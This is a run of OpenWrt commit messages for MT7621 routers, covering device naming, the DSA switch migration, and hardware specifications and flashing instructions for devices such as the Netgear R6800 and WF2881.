[adjust for kernel 5.4, add recovery instructions/frequency comment]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
So far, image/device/board names for Mikrotik devices in mt7621 have
been used quite inconsistently.
This patch harmonizes the naming scheme by applying the same style
as used lately in ath79, i.e. using "RouterBOARD" as separate word
in the model name (instead of RB prefix for the number) and deriving
the board/device name from that (= make lower case and replace spaces
by hyphens).
This style has already been used for most the model/DEVICE_MODEL
variables in mt7621, so this is essentially just adjusting the remaining
variables to that.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
DSA requires master netdev to be up before any of its slave ports.
Bring it up during preinit so that the first lan port can be used
on failsafe.
Signed-off-by: Chuanhong Guo <gch981213@gmail.com>
The name of each user port should be eth0..4, instead of lan1..4
and there is no WAN port. Rename them to match the official firmware.
To avoid conflict with the master port (gmac0), rename it to "dsa".
The official firmware assigns MAC address in this way:
eth0 = label mac
eth1 = label mac + 1
...
eth4 = label mac + 4
Since we have switched to DSA, it's possible to use different MAC for each port.
Acked-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Signed-off-by: DENG Qingfang <dengqf6@mail2.sysu.edu.cn>
Most of MT7621 boards have LAN1~4 and WAN, so make this as the default
Acked-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Signed-off-by: DENG Qingfang <dengqf6@mail2.sysu.edu.cn>
update dts and network/LED configuration for DSA driver.
sysupgrade from images prior to this commit with config preserved
will cause broken ethernet setup.
Signed-off-by: DENG Qingfang <dengqf6@mail2.sysu.edu.cn>
Acked-by: Jo-Philipp Wich <jo@mein.io>
[split commit]
Signed-off-by: Chuanhong Guo <gch981213@gmail.com>
Hardware
--------
SoC: MediaTek MT7621AT
WiFi: MediaTek MT7603 bgn 2T2R
MediaTek MT7615 ac 4T4R
Flash: 32M SPI (Macronix MX25L25635F)
RAM: 128M DDR3 (Winbond W631GG6KB)
LED: Dome (Blue / White)
BTN: Reset
Installation
------------
These instructions were written for firmware version v3.9.27.
Downgrade if necessary.
1. Copy the OpenWrt sysupgrade image to the devices /tmp folder
via scp. On factory defaults, user and password is "ubnt" at
192.168.1.20/24.
2. Write the bootselect flag. Otherwise, the device might boot from the
wrong partition. Verify the mtd partition used in the command below
is the one labled "bs" in /proc/mtd (as this might change in the
future).
> dd if=/dev/zero bs=1 count=1 of=/dev/mtd4
3. Write the OpenWrt sysupgrade to the mtd partitions labled
"kernel0" and "kernel1".
> dd if=/tmp/openwrt-sysupgrade.bin of=/dev/mtdblock6
> dd if=/tmp/openwrt-sysupgrade.bin of=/dev/mtdblock7
4. Reboot or powercycle the device.
Signed-off-by: David Bauer <mail@david-bauer.net>
This patch adds support for the Netgear R6800, aka Netgear AC1900 and
R6800-100PES.
Specification:
- SoC: MediaTek MT7621AT (880 MHz)
- Flash: 128 MiB NAND
- RAM: 256 MiB
- Wireless: MediaTek MT7615EN b/g/n , MediaTek MT7615EN an+ac
- LAN speed: 10/100/1000
- LAN ports: 4
- WAN speed: 10/100/1000
- WAN ports: 1
- USB 2.0
- USB 3.0
- Serial baud rate of Bootloader and factory firmware: 57600
Known issues:
- Device has 3 wifi LEDs: Wifi 5Ghz, Wifi 2.4Ghz and Wifi on/off.
Wifi on/off is not used.
Installation:
- apply factory image via stock web-gui.
Back to stock:
- nmrpflash can be used to recover to the stock Netgear firmware.
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
The correct model name of WF-2881 is WF2881 without hyphen. The former used
boardnames are not added to SUPPORTED_DEVICES, to make it explicit that the
sysupgrade-tar image, which is newly added in the previous commit, should
not be used to upgrade from older version.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
[adjust commit title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
WF-2881 sysupgrade image uses UBI rootfs, but still relies on
default_do_upgrade. Because of this, config backup is not restored after
sysupgrade. It can be fixed by switching to nand_do_upgrade and
sysupgrade-tar image. default_do_upgrade does not handle sysupgrade-tar
properly, so one should use factory image to upgrade from older version.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>